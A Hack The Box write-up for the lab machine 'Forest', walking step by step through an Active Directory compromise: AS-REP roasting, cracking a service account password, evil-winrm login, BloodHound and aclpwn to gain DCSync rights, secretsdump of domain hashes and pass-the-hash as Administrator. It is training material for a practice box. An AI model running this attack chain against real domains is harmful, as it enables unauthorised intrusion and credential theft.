Hack The Box - Forest Writeup

First Steps

The first step as with most other boxes is to run nmap on the box.


nmap -sC -sV -oA nmap -v


53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-25 11:09:14Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m10s, median: 6m48s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-02-25T03:11:35-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-02-25T11:11:31
|_  start_date: 2020-02-24T13:09:15

From this scan we can see we have a windows box that looks like an Active Directory controller.


Given that this box is an AD controller it would be best to first add the domain to our local hosts file so the DNS is propagated correctly.


echo " htb.local" | sudo tee -a /etc/host


Using Enum for Linux we can find further information about the AD configuration on the server. From this scan we find a user list.

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Removing the extra data from each line we can create a user list file to pass on to other scripts.

ASREPRoast Attack

Using impacket we can use the user list created to find any users that do not need Kerberos pre-authentication. This will return crackable hashes for the users we input.


Using the python Script GetNPUsers.py we pass a user list to the server and are given a crackable hash in the format of your choosing (john in this case) which is saved in a file named Forest

sudo python3 GetNPUsers.py htb.local/ -usersfile /home/kali/Desktop/Forest/users.txt -format john -outputfile Forest.hashes



We can see that svc-alfresco is a valid username and has a crackable password.

Cracking with john

John is an offline password cracking application that tries a wordlist against a hash. Using the rockyou.txt wordlist on the Forest.hashes file we should be able to crack the hash.

sudo john Forest --wordlist=/usr/share/wordlists/rockyou.txt

John should quickly find the password s3rvice for the svc-alfresco user.

Logging in with Evil-WinRM

Since port 5895 is open. We can use Evil-WinRM to login to the system with shell access.

evil-winrm -i -u svc-alfresco -p s3rvice -s '/home/kali/Desktop/Forest/scripts/'

Having obtained shell access. Traversing to the desktop of the user reveals the user.txt file.



Privilege Escalation

Since this box is focused on Active Directory. It’s worth checking to see if the server has any configurations errors using bloodhound to find a path to Domain Admin. To do this we need to a few things first.

Download Bloodhound & SharpHound.ps1

Downloading bloodhound on kali linux is as easy as running sudo apt-get install bloodhound. However you will still need to download the SharpHound.ps1 powershell script. This can be acquired from the bloodhound GitHub Repo.

If using another Linux Distribution follow the instructions on GitHub for installation.

Neo4j Setup

Before you can use bloodhound you must change the default password of the neo4j database.

  • Run sudo neo4j console
  • Navigate to
  • Login with the Username:neo4j and the password:neo4j
  • Change the password when prompted.
  • Leave the neo4j service running in the background

Evil-WinRM Invoke-Bloodhound

Evil-WinRM allows the uploading and executing of powershell scripts on a remote system.

Looking back at the connection command for evil-winrm we can see the flag -s '/home/kali/Desktop/Forest/scripts/'. This flag defines the location of powershell scripts on your attacking machine. Set this location to wherever you have your SharpHound.ps1 file.

Going back to the evil-winrm session we logged into earlier we can now run the Sharphound Powershell script. Type in SharpHound.ps1 and hit return. After a few seconds the script will be loaded in your evil session.

Running the evil command menu will show the now available Invoke-Bloodhound command.

Invoke-BloodHound -CollectionMethod All

Will create a zip folder with JSON files ready to be ingested into bloodhound.

to download the zip file from evil-winRM. simply type in download XXXXXXXXXXX.zip.


Now that we have our JSON files, Neo4j and bloodhound installed, we can being to analyse the AD configuration.

open bloodhound by typing in bloodhound on your local machine and login with the same credentials you used for neo4j.

Drag the downloaded zip file on to the bloodhound window.

Click on Queries and then Find Shortest Path To Domain Admins

This will then show a diagram that shows that the user svc-alfresco inherits rights through groups that allows the user to make domain changes to the Access Control List via the permission WriteDacl.

Examining the WriteDacl permission we can find how this can be exploited.

DC Sync Privileges & ACLPwn

To grant DCSync permissions to the user we use the aclpwn tool to make changes to the access control list.

AClPwn takes the bloodhound Domain structure and automatically does the escalation.

aclpwn -f svc-alfresco -ft user -d htb.local -du neo4j -dp kali
  • -f svc-alfresco The user we are escalating
  • -ft user The type of what we are escalating
  • -d htb.local The domain we are connecting to
  • -du neo4j -dp kali The username and password of the neo4j database where the bloodhound information is saved.

The user svc-alfresco now has DCSync Privileges.

DCSync Attack & Secretsdump.py

Since our user now has DCSync Privileges we are able to extract password hashes from the Domain using secretsdump.py from impacket.

python3 secretsdump.py SVC-ALFRESCO@

Type in the password and the script will dump the password hash for every user on the domain.


We now have the password hash 32693b11e6aa90eb43d32c72a07ceea6 for Administrator.

Using Evil-WinRM the hash can be passed to login as the Administrator and obtain full system access.


evil-winrm -i -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

We now have full Admin privileges on the system. Traversing through the directories to the Administrator desktop we find the root.txt file.